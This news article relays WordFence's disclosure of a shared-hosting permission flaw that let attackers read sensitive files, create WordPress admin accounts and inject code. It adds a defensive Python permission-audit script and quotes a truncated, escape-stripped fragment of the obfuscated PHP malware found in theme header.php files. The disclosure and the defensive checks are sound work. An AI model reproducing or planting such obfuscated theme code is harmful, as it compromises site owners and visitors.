Web Host Vulnerability Discovered at iPage, FatCow, PowWeb, and NetFirm

WordFence announced that it had discovered a vulnerability at four web hosting companies. WordFence warns that while the vulnerability has been patched, it is possible that sites were hacked prior to the fix.

Server settings allowed hackers to create WordPress administrator accounts from which the sites could be exploited with rogue code added to the WordPress theme.

WordFence urged site administrators to check their sites for rogue administrator accounts if they are hosted on iPage, FatCow, PowWeb, or NetFirm. All four are owned by the same company, Endurance International Group.

What Was the Server Vulnerability?

The affected servers had permission and file settings that allowed an attacker to view sensitive data. Other vulnerabilities allowed the attackers to access the database, add themselves as an administrator, and then take over the site.

This is how WordFence described the vulnerability:

“Four conditions existed that contributed to this vulnerability:

1. Customer files are all stored on a shared file system.

2. The full path to a user’s web root directory was public or could be guessed.

3. All directories in the path to a customer’s site root directory were either world-traversable (the execute bit for ‘all users’ is 1) or group-traversable (the execute bit for ‘group’ is 1), and the sensitive files were world-readable (the read bit for ‘all users’ is 1) or group-readable (the read bit for ‘group’ is 1).

4. An attacker could cause a program running in the group www to read files in arbitrary locations.”
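A site owner can check condition 3 against their own account. The following Python sketch is an added example, not code from WordFence or the hosting companies; it assumes the sensitive file is wp-config.php, and the function names and the `start` parameter are hypothetical.

```python
import os
import stat
import sys

# Assumption: wp-config.php is the sensitive file (it holds the database credentials).
SENSITIVE = ("wp-config.php",)

def access_class(mode, group_bit, other_bit):
    """Return 'world', 'group' or None for the given permission bits."""
    if mode & other_bit:
        return "world"
    if mode & group_bit:
        return "group"
    return None

def audit_web_root(web_root, start="/"):
    """Check condition 3 for one site.

    Returns (chain_open, blocking_dirs, exposed_files). chain_open is True
    only when every directory from `start` down to `web_root` is group- or
    world-traversable; a single owner-only directory closes the chain.
    """
    web_root, start = os.path.abspath(web_root), os.path.abspath(start)
    if os.path.commonpath([web_root, start]) != start:
        raise ValueError("web_root must be inside start")
    rel = os.path.relpath(web_root, start)
    dirs, current = [start], start
    for part in ([] if rel == "." else rel.split(os.sep)):
        current = os.path.join(current, part)
        dirs.append(current)
    blocking = [d for d in dirs
                if access_class(os.stat(d).st_mode, stat.S_IXGRP, stat.S_IXOTH) is None]
    exposed = []
    for name in SENSITIVE:
        path = os.path.join(web_root, name)
        if os.path.isfile(path):
            who = access_class(os.stat(path).st_mode, stat.S_IRGRP, stat.S_IROTH)
            if who:
                exposed.append((path, who))
    chain_open = not blocking
    # A readable file only matters if the whole directory chain can be walked.
    return chain_open, blocking, exposed if chain_open else []

if __name__ == "__main__" and len(sys.argv) > 1:
    print(audit_web_root(sys.argv[1]))
```

The check reads mode bits only; POSIX ACLs and actual group membership are not examined.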

Sites Could be Infected

WordFence warned that there was a period of time before the vulnerability was fixed during which sites hosted on these four hosting providers could have been infected.

It is recommended that site owners check their user lists to make sure there are no unauthorized administrators. If your site has been affected, then there should be rogue code that was added to the theme.

Here is how WordFence described the rogue code:

“If your site was exploited before the fixes, the attackers may have added malware which could still be present. Our customers had obfuscated code added at the top of the active theme’s header.php file, similar to this:

<?php ${“x47x4cx4fx42x41x4cx53”}[“ddx70x68zx67x64gx”]=”slx77kx77i”;${“x47x4cOx42x41Lx53”}[“cx7ax66x6dubkdox6ax78″]=”x6cx6fx63x61tx69x6fn”;${“x47x4cx4fBx41LS”}[“x67x64x64ex74x62px75fx65i”]=”x68tx6dx6c”;${“x47x4cOBx41x4cS”}[“x77ix64x68x6bvx6da”]=”x73tx72x66″;${“x47x4cx4fx42x41x4cx53”}[“x66sx75x71x79x6evw”]=”bx6fx74″;${“x47x4cOBALx53”}[“wx6cx79x63x61x76x62x71x68x6fx6cx75″]=”cacx68x65”;${“Gx4cOx42x41Lx53”}[“ryx68x72kux6b”]=”x73x63hx65x6dx65″;${“x47x4cx4fx42x41Lx53”}[“x74x6ax6bcx64ex65x69w”]=”x73lx77kx77ix32″;${“Gx4cOBAx4cS”}[“x79x65x64x73x67x6ahx69x73x67″]=”x73x6cx74lx65x69lx73″;”

Vulnerability Has Been Fixed

WordFence disclosed the vulnerability to the web hosting companies before making a public announcement. The web hosting companies promptly fixed the vulnerabilities.

Nevertheless, according to the guidance offered by WordFence, you may wish to check your user lists for rogue admin level accounts and review your header.php file for rogue code.

Read the entire announcement at the WordFence blog

Images by Shutterstock, Modified by Author
